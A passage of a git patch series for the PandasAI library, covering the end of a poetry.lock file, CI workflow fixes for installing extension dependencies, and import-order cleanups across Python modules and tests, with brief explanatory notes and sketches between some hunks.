+tf = ["keras-nlp (>=0.3.1,<0.14.0)", "onnxconverter-common", "tensorflow (>2.9,<2.16)", "tensorflow-text (<2.16)", "tf2onnx"]
+tf-cpu = ["keras (>2.9,<2.16)", "keras-nlp (>=0.3.1,<0.14.0)", "onnxconverter-common", "tensorflow-cpu (>2.9,<2.16)", "tensorflow-probability (<0.24)", "tensorflow-text (<2.16)", "tf2onnx"]
+tf-speech = ["kenlm", "librosa", "phonemizer", "pyctcdecode (>=0.4.0)"]
+tiktoken = ["blobfile", "tiktoken"]
+timm = ["timm (<=0.9.16)"]
+tokenizers = ["tokenizers (>=0.20,<0.21)"]
+torch = ["accelerate (>=0.26.0)", "torch"]
+torch-speech = ["kenlm", "librosa", "phonemizer", "pyctcdecode (>=0.4.0)", "torchaudio"]
+torch-vision = ["Pillow (>=10.0.1,<=15.0)", "torchvision"]
+torchhub = ["filelock", "huggingface-hub (>=0.23.2,<1.0)", "importlib-metadata", "numpy (>=1.17)", "packaging (>=20.0)", "protobuf", "regex (!=2019.12.17)", "requests", "sentencepiece (>=0.1.91,!=0.1.92)", "tokenizers (>=0.20,<0.21)", "torch", "tqdm (>=4.27)"]
+video = ["av (==9.2.0)"]
+vision = ["Pillow (>=10.0.1,<=15.0)"]
+
+[[package]]
+name = "typing-extensions"
+version = "4.12.2"
+description = "Backported and Experimental Type Hints for Python 3.8+"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "typing_extensions-4.12.2-py3-none-any.whl", hash = "sha256:04e5ca0351e0f3f85c6853954072df659d0d13fac324d0072316b67d7794700d"},
+ {file = "typing_extensions-4.12.2.tar.gz", hash = "sha256:1a7ead55c7e559dd4dee8856e3a88b41225abfe1ce8df57b7c13915fe121ffb8"},
+]
+
+[[package]]
+name = "tzdata"
+version = "2024.2"
+description = "Provider of IANA time zone data"
+optional = false
+python-versions = ">=2"
+files = [
+ {file = "tzdata-2024.2-py2.py3-none-any.whl", hash = "sha256:a48093786cdcde33cad18c2555e8532f34422074448fbc874186f0abd79565cd"},
+ {file = "tzdata-2024.2.tar.gz", hash = "sha256:7d85cc416e9382e69095b7bdf4afd9e3880418a2413feec7069d533d6b4e31cc"},
+]
+
+[[package]]
+name = "urllib3"
+version = "2.2.3"
+description = "HTTP library with thread-safe connection pooling, file post, and more."
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "urllib3-2.2.3-py3-none-any.whl", hash = "sha256:ca899ca043dcb1bafa3e262d73aa25c465bfb49e0bd9dd5d59f1d0acba2f8fac"},
+ {file = "urllib3-2.2.3.tar.gz", hash = "sha256:e7d814a81dad81e6caf2ec9fdedb284ecc9c73076b62654547cc64ccdcae26e9"},
+]
+
+[package.extras]
+brotli = ["brotli (>=1.0.9)", "brotlicffi (>=0.8.0)"]
+h2 = ["h2 (>=4,<5)"]
+socks = ["pysocks (>=1.5.6,!=1.5.7,<2.0)"]
+zstd = ["zstandard (>=0.18.0)"]
+
+[[package]]
+name = "virtualenv"
+version = "20.28.1"
+description = "Virtual Python Environment builder"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "virtualenv-20.28.1-py3-none-any.whl", hash = "sha256:412773c85d4dab0409b83ec36f7a6499e72eaf08c80e81e9576bca61831c71cb"},
+ {file = "virtualenv-20.28.1.tar.gz", hash = "sha256:5d34ab240fdb5d21549b76f9e8ff3af28252f5499fb6d6f031adac4e5a8c5329"},
+]
+
+[package.dependencies]
+distlib = ">=0.3.7,<1"
+filelock = ">=3.12.2,<4"
+platformdirs = ">=3.9.1,<5"
+
+[package.extras]
+docs = ["furo (>=2023.7.26)", "proselint (>=0.13)", "sphinx (>=7.1.2,!=7.3)", "sphinx-argparse (>=0.4)", "sphinxcontrib-towncrier (>=0.2.1a0)", "towncrier (>=23.6)"]
+test = ["covdefaults (>=2.3)", "coverage (>=7.2.7)", "coverage-enable-subprocess (>=1)", "flaky (>=3.7)", "packaging (>=23.1)", "pytest (>=7.4)", "pytest-env (>=0.8.2)", "pytest-freezer (>=0.4.8)", "pytest-mock (>=3.11.1)", "pytest-randomly (>=3.12)", "pytest-timeout (>=2.1)", "setuptools (>=68)", "time-machine (>=2.10)"]
+
+[[package]]
+name = "watchdog"
+version = "4.0.2"
+description = "Filesystem events monitoring"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "watchdog-4.0.2-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:ede7f010f2239b97cc79e6cb3c249e72962404ae3865860855d5cbe708b0fd22"},
+ {file = "watchdog-4.0.2-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:a2cffa171445b0efa0726c561eca9a27d00a1f2b83846dbd5a4f639c4f8ca8e1"},
+ {file = "watchdog-4.0.2-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:c50f148b31b03fbadd6d0b5980e38b558046b127dc483e5e4505fcef250f9503"},
+ {file = "watchdog-4.0.2-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:7c7d4bf585ad501c5f6c980e7be9c4f15604c7cc150e942d82083b31a7548930"},
+ {file = "watchdog-4.0.2-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:914285126ad0b6eb2258bbbcb7b288d9dfd655ae88fa28945be05a7b475a800b"},
+ {file = "watchdog-4.0.2-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:984306dc4720da5498b16fc037b36ac443816125a3705dfde4fd90652d8028ef"},
+ {file = "watchdog-4.0.2-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:1cdcfd8142f604630deef34722d695fb455d04ab7cfe9963055df1fc69e6727a"},
+ {file = "watchdog-4.0.2-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:d7ab624ff2f663f98cd03c8b7eedc09375a911794dfea6bf2a359fcc266bff29"},
+ {file = "watchdog-4.0.2-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:132937547a716027bd5714383dfc40dc66c26769f1ce8a72a859d6a48f371f3a"},
+ {file = "watchdog-4.0.2-cp313-cp313-macosx_10_13_universal2.whl", hash = "sha256:cd67c7df93eb58f360c43802acc945fa8da70c675b6fa37a241e17ca698ca49b"},
+ {file = "watchdog-4.0.2-cp313-cp313-macosx_10_13_x86_64.whl", hash = "sha256:bcfd02377be80ef3b6bc4ce481ef3959640458d6feaae0bd43dd90a43da90a7d"},
+ {file = "watchdog-4.0.2-cp313-cp313-macosx_11_0_arm64.whl", hash = "sha256:980b71510f59c884d684b3663d46e7a14b457c9611c481e5cef08f4dd022eed7"},
+ {file = "watchdog-4.0.2-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:aa160781cafff2719b663c8a506156e9289d111d80f3387cf3af49cedee1f040"},
+ {file = "watchdog-4.0.2-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:f6ee8dedd255087bc7fe82adf046f0b75479b989185fb0bdf9a98b612170eac7"},
+ {file = "watchdog-4.0.2-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:0b4359067d30d5b864e09c8597b112fe0a0a59321a0f331498b013fb097406b4"},
+ {file = "watchdog-4.0.2-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:770eef5372f146997638d737c9a3c597a3b41037cfbc5c41538fc27c09c3a3f9"},
+ {file = "watchdog-4.0.2-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:eeea812f38536a0aa859972d50c76e37f4456474b02bd93674d1947cf1e39578"},
+ {file = "watchdog-4.0.2-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:b2c45f6e1e57ebb4687690c05bc3a2c1fb6ab260550c4290b8abb1335e0fd08b"},
+ {file = "watchdog-4.0.2-pp310-pypy310_pp73-macosx_10_15_x86_64.whl", hash = "sha256:10b6683df70d340ac3279eff0b2766813f00f35a1d37515d2c99959ada8f05fa"},
+ {file = "watchdog-4.0.2-pp310-pypy310_pp73-macosx_11_0_arm64.whl", hash = "sha256:f7c739888c20f99824f7aa9d31ac8a97353e22d0c0e54703a547a218f6637eb3"},
+ {file = "watchdog-4.0.2-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:c100d09ac72a8a08ddbf0629ddfa0b8ee41740f9051429baa8e31bb903ad7508"},
+ {file = "watchdog-4.0.2-pp38-pypy38_pp73-macosx_11_0_arm64.whl", hash = "sha256:f5315a8c8dd6dd9425b974515081fc0aadca1d1d61e078d2246509fd756141ee"},
+ {file = "watchdog-4.0.2-pp39-pypy39_pp73-macosx_10_15_x86_64.whl", hash = "sha256:2d468028a77b42cc685ed694a7a550a8d1771bb05193ba7b24006b8241a571a1"},
+ {file = "watchdog-4.0.2-pp39-pypy39_pp73-macosx_11_0_arm64.whl", hash = "sha256:f15edcae3830ff20e55d1f4e743e92970c847bcddc8b7509bcd172aa04de506e"},
+ {file = "watchdog-4.0.2-py3-none-manylinux2014_aarch64.whl", hash = "sha256:936acba76d636f70db8f3c66e76aa6cb5136a936fc2a5088b9ce1c7a3508fc83"},
+ {file = "watchdog-4.0.2-py3-none-manylinux2014_armv7l.whl", hash = "sha256:e252f8ca942a870f38cf785aef420285431311652d871409a64e2a0a52a2174c"},
+ {file = "watchdog-4.0.2-py3-none-manylinux2014_i686.whl", hash = "sha256:0e83619a2d5d436a7e58a1aea957a3c1ccbf9782c43c0b4fed80580e5e4acd1a"},
+ {file = "watchdog-4.0.2-py3-none-manylinux2014_ppc64.whl", hash = "sha256:88456d65f207b39f1981bf772e473799fcdc10801062c36fd5ad9f9d1d463a73"},
+ {file = "watchdog-4.0.2-py3-none-manylinux2014_ppc64le.whl", hash = "sha256:32be97f3b75693a93c683787a87a0dc8db98bb84701539954eef991fb35f5fbc"},
+ {file = "watchdog-4.0.2-py3-none-manylinux2014_s390x.whl", hash = "sha256:c82253cfc9be68e3e49282831afad2c1f6593af80c0daf1287f6a92657986757"},
+ {file = "watchdog-4.0.2-py3-none-manylinux2014_x86_64.whl", hash = "sha256:c0b14488bd336c5b1845cee83d3e631a1f8b4e9c5091ec539406e4a324f882d8"},
+ {file = "watchdog-4.0.2-py3-none-win32.whl", hash = "sha256:0d8a7e523ef03757a5aa29f591437d64d0d894635f8a50f370fe37f913ce4e19"},
+ {file = "watchdog-4.0.2-py3-none-win_amd64.whl", hash = "sha256:c344453ef3bf875a535b0488e3ad28e341adbd5a9ffb0f7d62cefacc8824ef2b"},
+ {file = "watchdog-4.0.2-py3-none-win_ia64.whl", hash = "sha256:baececaa8edff42cd16558a639a9b0ddf425f93d892e8392a56bf904f5eff22c"},
+ {file = "watchdog-4.0.2.tar.gz", hash = "sha256:b4dfbb6c49221be4535623ea4474a4d6ee0a9cef4a80b20c28db4d858b64e270"},
+]
+
+[package.extras]
+watchmedo = ["PyYAML (>=3.10)"]
+
+[[package]]
+name = "wheel"
+version = "0.45.1"
+description = "A built-package format for Python"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "wheel-0.45.1-py3-none-any.whl", hash = "sha256:708e7481cc80179af0e556bbf0cc00b8444c7321e2700b8d8580231d13017248"},
+ {file = "wheel-0.45.1.tar.gz", hash = "sha256:661e1abd9198507b1409a20c02106d9670b2576e916d58f520316666abca6729"},
+]
+
+[package.extras]
+test = ["pytest (>=6.0.0)", "setuptools (>=65)"]
+
+[[package]]
+name = "zipp"
+version = "3.20.2"
+description = "Backport of pathlib-compatible object wrapper for zip files"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "zipp-3.20.2-py3-none-any.whl", hash = "sha256:a817ac80d6cf4b23bf7f2828b7cabf326f15a001bea8b1f9b49631780ba28350"},
+ {file = "zipp-3.20.2.tar.gz", hash = "sha256:bc9eb26f4506fda01b81bcde0ca78103b6e62f991b381fec825435c836edbc29"},
+]
+
+[package.extras]
+check = ["pytest-checkdocs (>=2.4)", "pytest-ruff (>=0.2.1)"]
+cover = ["pytest-cov"]
+doc = ["furo", "jaraco.packaging (>=9.3)", "jaraco.tidelift (>=1.4)", "rst.linker (>=1.9)", "sphinx (>=3.5)", "sphinx-lint"]
+enabler = ["pytest-enabler (>=2.2)"]
+test = ["big-O", "importlib-resources", "jaraco.functools", "jaraco.itertools", "jaraco.test", "more-itertools", "pytest (>=6,!=8.1.*)", "pytest-ignore-flaky"]
+type = ["pytest-mypy"]
+
+[extras]
+excel = ["openpyxl"]
+google-sheets = ["beautifulsoup4"]
+
+[metadata]
+lock-version = "2.0"
+python-versions = ">=3.8,<3.9.7 || >3.9.7,<3.12"
+content-hash = "8f347a6563bfe2c9da038562f35002996495fe7e7ee1bef899ff2e93a1948a23"
From 58fcff7ea6f8ad75293876e867805560d4065a3e Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 11:52:18 +0100
Subject: [PATCH 22/58] fix: github ci workflow
---
.github/workflows/ci.yml | 12 ++++++------
1 file changed, 6 insertions(+), 6 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index dff4a8451..2b5ef7038 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -44,7 +44,7 @@ jobs:
if [ -f "$dir/pyproject.toml" ]; then
echo "Installing dependencies for $dir"
cd "$dir"
- poetry install --all-extras --with dev
+ poetry install --all-extras
cd -
fi
done
@@ -54,7 +54,7 @@ jobs:
if [ -f "$dir/pyproject.toml" ]; then
echo "Installing dependencies for $dir"
cd "$dir"
- poetry install --all-extras --with dev
+ poetry install --all-extras
cd -
fi
done
@@ -64,7 +64,7 @@ jobs:
if [ -f "$dir/pyproject.toml" ]; then
echo "Installing dependencies for $dir"
cd "$dir"
- poetry install --all-extras --with dev
+ poetry install --all-extras
cd -
fi
done
@@ -77,7 +77,7 @@ jobs:
if (Test-Path $projFile) {
Write-Host "Installing dependencies for $_"
Push-Location $_.FullName
- poetry install --all-extras --with dev
+ poetry install --all-extras
Pop-Location
}
}
@@ -88,7 +88,7 @@ jobs:
if (Test-Path $projFile) {
Write-Host "Installing dependencies for $_"
Push-Location $_.FullName
- poetry install --all-extras --with dev
+ poetry install --all-extras
Pop-Location
}
}
@@ -99,7 +99,7 @@ jobs:
if (Test-Path $projFile) {
Write-Host "Installing dependencies for $_"
Push-Location $_.FullName
- poetry install --all-extras --with dev
+ poetry install --all-extras
Pop-Location
}
}
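
The hunks above drop `--with dev` from the per-extension installs. Poetry exits non-zero when a group requested via `--with` is absent from the target pyproject.toml (reporting something like "Group(s) not found: dev (via --with)"), so any extension without a dev group would fail the step. A hedged sketch of a variant that only requests the group where it actually exists; the grep-based check is an assumption, not taken from this repository's manifests:

    # Inside each extension directory:
    if grep -q '^\[tool\.poetry\.group\.dev' pyproject.toml; then
        poetry install --all-extras --with dev
    else
        poetry install --all-extras
    fi
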
From b47f79ed967075f285cfbd27c2f873605ded6c24 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 11:56:30 +0100
Subject: [PATCH 23/58] fix: extension deps installation
---
.github/workflows/ci.yml | 9 +++------
1 file changed, 3 insertions(+), 6 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 2b5ef7038..e57e26698 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -39,8 +39,7 @@ jobs:
run: poetry install --all-extras --with dev --verbose
- name: Install extension dependencies
run: |
- # Install LLM extension dependencies
- for dir in extensions/llms/*/; do
+ for dir in $(find extensions/llms -mindepth 1 -maxdepth 1 -type d); do
if [ -f "$dir/pyproject.toml" ]; then
echo "Installing dependencies for $dir"
cd "$dir"
@@ -49,8 +48,7 @@ jobs:
fi
done
- # Install connector extension dependencies
- for dir in extensions/connectors/*/; do
+ for dir in $(find extensions/connectors -mindepth 1 -maxdepth 1 -type d); do
if [ -f "$dir/pyproject.toml" ]; then
echo "Installing dependencies for $dir"
cd "$dir"
@@ -59,8 +57,7 @@ jobs:
fi
done
- # Install enterprise extension dependencies
- for dir in extensions/ee/*/*/; do
+ for dir in $(find extensions/ee -mindepth 2 -maxdepth 2 -type d); do
if [ -f "$dir/pyproject.toml" ]; then
echo "Installing dependencies for $dir"
cd "$dir"
From ebb83a524b414fab85c26f59938b302efbaad0a7 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 13:35:39 +0100
Subject: [PATCH 24/58] fix: github workflows
---
.github/workflows/ci.yml | 36 +++++++++++-------------------------
1 file changed, 11 insertions(+), 25 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index e57e26698..3c7ee268c 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -39,31 +39,17 @@ jobs:
run: poetry install --all-extras --with dev --verbose
- name: Install extension dependencies
run: |
- for dir in $(find extensions/llms -mindepth 1 -maxdepth 1 -type d); do
- if [ -f "$dir/pyproject.toml" ]; then
- echo "Installing dependencies for $dir"
- cd "$dir"
- poetry install --all-extras
- cd -
- fi
- done
-
- for dir in $(find extensions/connectors -mindepth 1 -maxdepth 1 -type d); do
- if [ -f "$dir/pyproject.toml" ]; then
- echo "Installing dependencies for $dir"
- cd "$dir"
- poetry install --all-extras
- cd -
- fi
- done
-
- for dir in $(find extensions/ee -mindepth 2 -maxdepth 2 -type d); do
- if [ -f "$dir/pyproject.toml" ]; then
- echo "Installing dependencies for $dir"
- cd "$dir"
- poetry install --all-extras
- cd -
- fi
+ find extensions/ -mindepth 1 -type d \( \
+ -path "extensions/llms/*" -o \
+ -path "extensions/connectors/*" -o \
+ -path "extensions/ee/*/*" \) | while read -r dir; do
+ if [ -f "$dir/pyproject.toml" ]; then
+ echo "Installing dependencies for $dir"
+ (
+ cd "$dir" || exit
+ poetry install --all-extras
+ )
+ fi
done
- name: Install extension dependencies (Windows)
if: matrix.os == 'windows-latest'
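
The consolidated loop also trades `cd "$dir" ... cd -` for a subshell. Because `( ... )` confines the directory change to a child shell, the working directory stays stable even when an install fails mid-iteration, and no `cd -` bookkeeping is needed. A minimal sketch of the pattern:

    for dir in pkg-a pkg-b; do
        (
            cd "$dir" || exit   # exit only leaves the subshell
            poetry install --all-extras
        )
        pwd                     # still the original directory
    done
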
From 967118ac3fefa9467f4f01e0f0335c82d8fc34b4 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 13:38:45 +0100
Subject: [PATCH 25/58] fix: unnecessary comments
---
client/components/card/index.tsx | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/client/components/card/index.tsx b/client/components/card/index.tsx
index 1d2f61be8..448ff6407 100644
--- a/client/components/card/index.tsx
+++ b/client/components/card/index.tsx
@@ -3,7 +3,7 @@ import React from "react";
function Card(props: {
className?: string;
extra?: string;
- children?: React.ReactNode; // Simplified type
+ children?: React.ReactNode;
default?: boolean;
}) {
const { extra, children, ...rest } = props;
@@ -12,7 +12,7 @@ function Card(props: {
className={`!z-5 relative flex flex-col rounded-[20px] shadow-[rgba(0, 0, 0, 0.2)] shadow-md border border-gray-100 dark:border-none dark:shadow-none bg-clip-border dark:!bg-darkMain dark:text-white ${extra}`}
{...rest}
>
- {children} {/* Removed unnecessary fragment */}
+ {children}
);
}
From dd61ab8ae81d9f6f1ffab89c3561a88d9a655d2b Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 13:43:28 +0100
Subject: [PATCH 26/58] fix: ruff errors
---
examples/from_yahoo_finance.py | 4 +++-
pandasai/__init__.py | 9 +++++----
pandasai/agent/base.py | 16 +++++++---------
pandasai/agent/state.py | 7 +++----
pandasai/config.py | 11 +++++------
pandasai/core/code_execution/code_executor.py | 6 +++---
pandasai/core/code_execution/environment.py | 5 +++--
pandasai/core/code_generation/__init__.py | 2 +-
pandasai/core/code_generation/base.py | 1 +
pandasai/core/code_generation/code_cleaning.py | 2 +-
pandasai/core/code_generation/code_security.py | 2 ++
pandasai/core/prompts/__init__.py | 5 ++++-
pandasai/core/prompts/base.py | 2 +-
pandasai/core/response/base.py | 5 ++++-
pandasai/core/user_query.py | 1 +
pandasai/data_loader/loader.py | 14 ++++++++------
pandasai/data_loader/query_builder.py | 2 +-
pandasai/dataframe/__init__.py | 1 -
pandasai/dataframe/base.py | 15 +++++++--------
pandasai/dataframe/query_builder.py | 2 +-
pandasai/dataframe/virtual_dataframe.py | 3 +++
pandasai/helpers/data_sampler.py | 1 -
pandasai/helpers/from_google_sheets.py | 3 +--
pandasai/helpers/logger.py | 3 ++-
pandasai/helpers/output_validator.py | 2 +-
pandasai/helpers/request.py | 2 +-
pandasai/llm/bamboo_llm.py | 2 +-
pandasai/smart_dataframe/__init__.py | 7 +++++--
pandasai/smart_datalake/__init__.py | 7 +++++--
tests/unit_tests/agent/test_agent.py | 4 ++--
.../safe_libs/test_base_restricted_module.py | 1 +
.../core/code_execution/test_code_execution.py | 5 +++--
.../core/code_execution/test_environment.py | 5 +++--
.../core/code_generation/test_code_cleaning.py | 7 ++++---
.../core/code_generation/test_code_security.py | 3 ++-
.../core/code_generation/test_code_validation.py | 4 ++--
tests/unit_tests/core/prompts/test_prompts.py | 3 ++-
tests/unit_tests/dataframe/test_dataframe.py | 10 ++++++----
tests/unit_tests/dataframe/test_loader.py | 10 ++++++----
tests/unit_tests/dataframe/test_query_builder.py | 1 +
tests/unit_tests/helpers/test_file_importer.py | 2 +-
tests/unit_tests/helpers/test_responses.py | 6 ++++--
tests/unit_tests/llms/test_bamboo_llm.py | 2 +-
.../prompts/test_correct_error_prompt.py | 2 +-
.../prompts/test_generate_python_code_prompt.py | 2 +-
tests/unit_tests/prompts/test_sql_prompt.py | 5 ++---
tests/unit_tests/test_file_importer.py | 2 +-
tests/unit_tests/test_pandasai_init.py | 7 ++++---
48 files changed, 127 insertions(+), 96 deletions(-)
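
The import reshuffles below follow isort conventions: `__future__` first, then standard library, third-party, first-party (pandasai), and finally relative imports, each group separated by a blank line. Fixes of this shape can be reproduced mechanically; a sketch, assuming ruff's isort-compatible `I` rules are enabled for the project:

    # Report import-order (isort) violations only:
    ruff check --select I .

    # Apply the fixes in place, yielding hunks like the ones below:
    ruff check --select I --fix .
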
diff --git a/examples/from_yahoo_finance.py b/examples/from_yahoo_finance.py
index b0e6c2590..5e27d5b9e 100644
--- a/examples/from_yahoo_finance.py
+++ b/examples/from_yahoo_finance.py
@@ -1,7 +1,9 @@
import os
+from extensions.connectors.yfinance.pandasai_yfinance.yahoo_finance import (
+ YahooFinanceConnector,
+)
from pandasai import Agent
-from extensions.connectors.yfinance.pandasai_yfinance.yahoo_finance import YahooFinanceConnector
yahoo_connector = YahooFinanceConnector("MSFT")
diff --git a/pandasai/__init__.py b/pandasai/__init__.py
index c7cb826a2..5703e2cad 100644
--- a/pandasai/__init__.py
+++ b/pandasai/__init__.py
@@ -3,21 +3,22 @@
PandasAI is a wrapper around a LLM to make dataframes conversational
"""
-from io import BytesIO
import os
+from io import BytesIO
from typing import List
from zipfile import ZipFile
import pandas as pd
-from pandasai.config import ConfigManager, APIKeyManager
+from pandasai.config import APIKeyManager, ConfigManager
from pandasai.exceptions import DatasetNotFound, PandasAIApiKeyError
from pandasai.helpers.path import find_project_root
from pandasai.helpers.request import get_pandaai_session
+
from .agent import Agent
-from .helpers.cache import Cache
-from .dataframe.base import DataFrame
from .data_loader.loader import DatasetLoader
+from .dataframe.base import DataFrame
+from .helpers.cache import Cache
from .smart_dataframe import SmartDataframe
from .smart_datalake import SmartDatalake
diff --git a/pandasai/agent/base.py b/pandasai/agent/base.py
index f7b9c7b56..30f802fe0 100644
--- a/pandasai/agent/base.py
+++ b/pandasai/agent/base.py
@@ -1,5 +1,7 @@
import traceback
import uuid
+import warnings
+from importlib.util import find_spec
from typing import Any, List, Optional, Tuple, Union
from pandasai.core.cache import Cache
@@ -12,31 +14,27 @@
get_correct_error_prompt_for_sql,
get_correct_output_type_error_prompt,
)
+from pandasai.core.prompts.base import BasePrompt
from pandasai.core.response.base import ResponseParser
from pandasai.core.user_query import UserQuery
+from pandasai.data_loader.schema_validator import is_schema_source_same
from pandasai.dataframe.base import DataFrame
from pandasai.dataframe.virtual_dataframe import VirtualDataFrame
-
-from .state import AgentState
-from pandasai.core.prompts.base import BasePrompt
-from pandasai.data_loader.schema_validator import is_schema_source_same
from pandasai.llm.bamboo_llm import BambooLLM
from pandasai.vectorstores.vectorstore import VectorStore
-from ..config import load_config_from_json
+from ..config import Config, load_config_from_json
from ..constants import DEFAULT_CACHE_DIRECTORY, DEFAULT_CHART_DIRECTORY
from ..exceptions import (
- InvalidLLMOutputType,
InvalidConfigError,
+ InvalidLLMOutputType,
MissingVectorStoreError,
)
from ..helpers.folder import Folder
from ..helpers.logger import Logger
from ..helpers.memory import Memory
from ..llm.base import LLM
-from importlib.util import find_spec
-from ..config import Config
-import warnings
+from .state import AgentState
class Agent:
diff --git a/pandasai/agent/state.py b/pandasai/agent/state.py
index 693832103..ca826b7cb 100644
--- a/pandasai/agent/state.py
+++ b/pandasai/agent/state.py
@@ -1,17 +1,16 @@
from __future__ import annotations
+
from dataclasses import dataclass, field
from typing import TYPE_CHECKING, Any, Dict, List, Optional, Union
+from pandasai.config import Config
from pandasai.helpers.cache import Cache
from pandasai.helpers.logger import Logger
from pandasai.helpers.memory import Memory
-
-from pandasai.config import Config
from pandasai.vectorstores.vectorstore import VectorStore
if TYPE_CHECKING:
- from pandasai.dataframe import DataFrame
- from pandasai.dataframe import VirtualDataFrame
+ from pandasai.dataframe import DataFrame, VirtualDataFrame
@dataclass
diff --git a/pandasai/config.py b/pandasai/config.py
index 66af9637c..fde784d32 100644
--- a/pandasai/config.py
+++ b/pandasai/config.py
@@ -1,17 +1,16 @@
-from importlib.util import find_spec
import json
import os
+from importlib.util import find_spec
+from typing import Any, Dict, List, Literal, Optional, Union
+
+from pydantic import BaseModel, ConfigDict, Field
import pandasai.llm as llm
+from pandasai.constants import DEFAULT_CHART_DIRECTORY
from pandasai.llm.base import LLM
from .helpers.path import find_closest
-from typing import Any, List, Optional, Dict, Union, Literal
-from pydantic import BaseModel, Field, ConfigDict
-
-from pandasai.constants import DEFAULT_CHART_DIRECTORY
-
class Config(BaseModel):
save_logs: bool = True
diff --git a/pandasai/core/code_execution/code_executor.py b/pandasai/core/code_execution/code_executor.py
index 91aa13816..0e62124c2 100644
--- a/pandasai/core/code_execution/code_executor.py
+++ b/pandasai/core/code_execution/code_executor.py
@@ -1,10 +1,10 @@
import ast
-from pandasai.core.code_execution.environment import get_environment
+from typing import Any, List
+
from pandasai.config import Config
+from pandasai.core.code_execution.environment import get_environment
from pandasai.exceptions import NoResultFoundError
-from typing import Any, List
-
class CodeExecutor:
"""
diff --git a/pandasai/core/code_execution/environment.py b/pandasai/core/code_execution/environment.py
index ff2bef1d9..b42244823 100644
--- a/pandasai/core/code_execution/environment.py
+++ b/pandasai/core/code_execution/environment.py
@@ -5,11 +5,14 @@
import importlib
import sys
+import types
import warnings
from typing import List, Union
from pandas.util.version import Version
+from pandasai.constants import WHITELISTED_BUILTINS
+
from .safe_libs.restricted_base64 import RestrictedBase64
from .safe_libs.restricted_datetime import (
RestrictedDatetime,
@@ -20,8 +23,6 @@
)
from .safe_libs.restricted_numpy import RestrictedNumpy
from .safe_libs.restricted_pandas import RestrictedPandas
-from pandasai.constants import WHITELISTED_BUILTINS
-import types
# Minimum version required for each optional dependency
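For context on the hunk above: `WHITELISTED_BUILTINS` now lives with the environment module that builds the sandbox for generated code. A minimal sketch of the whitelisted-builtins pattern, assuming a simple allowlist — the names `WHITELIST` and `build_restricted_env` are illustrative, not PandasAI's actual API:

```python
# Illustrative sketch: expose only an allowlist of builtins to exec-ed code.
import builtins

WHITELIST = ["abs", "len", "min", "max", "range", "sum", "print"]

def build_restricted_env() -> dict:
    # Map each whitelisted name to the real builtin; everything else is absent.
    safe_builtins = {name: getattr(builtins, name) for name in WHITELIST}
    return {"__builtins__": safe_builtins}

env = build_restricted_env()
exec("print(sum(range(5)))", env)  # works: print/sum/range are whitelisted
# exec("open('x')", env)           # would raise NameError: open is not exposed
```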
diff --git a/pandasai/core/code_generation/__init__.py b/pandasai/core/code_generation/__init__.py
index 8c62e09ca..2cc0b320b 100644
--- a/pandasai/core/code_generation/__init__.py
+++ b/pandasai/core/code_generation/__init__.py
@@ -1,5 +1,5 @@
-from .code_cleaning import CodeCleaner
from .base import CodeGenerator
+from .code_cleaning import CodeCleaner
from .code_security import CodeSecurityChecker
from .code_validation import CodeRequirementValidator
diff --git a/pandasai/core/code_generation/base.py b/pandasai/core/code_generation/base.py
index 498acec5a..f6561abbc 100644
--- a/pandasai/core/code_generation/base.py
+++ b/pandasai/core/code_generation/base.py
@@ -2,6 +2,7 @@
from pandasai.agent.state import AgentState
from pandasai.core.prompts.base import BasePrompt
+
from .code_cleaning import CodeCleaner
from .code_security import CodeSecurityChecker
from .code_validation import CodeRequirementValidator
diff --git a/pandasai/core/code_generation/code_cleaning.py b/pandasai/core/code_generation/code_cleaning.py
index 7d288d6c1..b2555b6cb 100644
--- a/pandasai/core/code_generation/code_cleaning.py
+++ b/pandasai/core/code_generation/code_cleaning.py
@@ -4,8 +4,8 @@
from typing import Union
import astor
-from pandasai.agent.state import AgentState
+from pandasai.agent.state import AgentState
from pandasai.core.code_execution.code_executor import CodeExecutor
from pandasai.helpers.path import find_project_root
from pandasai.helpers.sql import extract_table_names
diff --git a/pandasai/core/code_generation/code_security.py b/pandasai/core/code_generation/code_security.py
index 09860eaa0..9202b40fb 100644
--- a/pandasai/core/code_generation/code_security.py
+++ b/pandasai/core/code_generation/code_security.py
@@ -1,6 +1,8 @@
import ast
import re
+
import astor
+
from pandasai.agent.state import AgentState
from pandasai.constants import RESTRICTED_LIBS
from pandasai.exceptions import MaliciousCodeGenerated
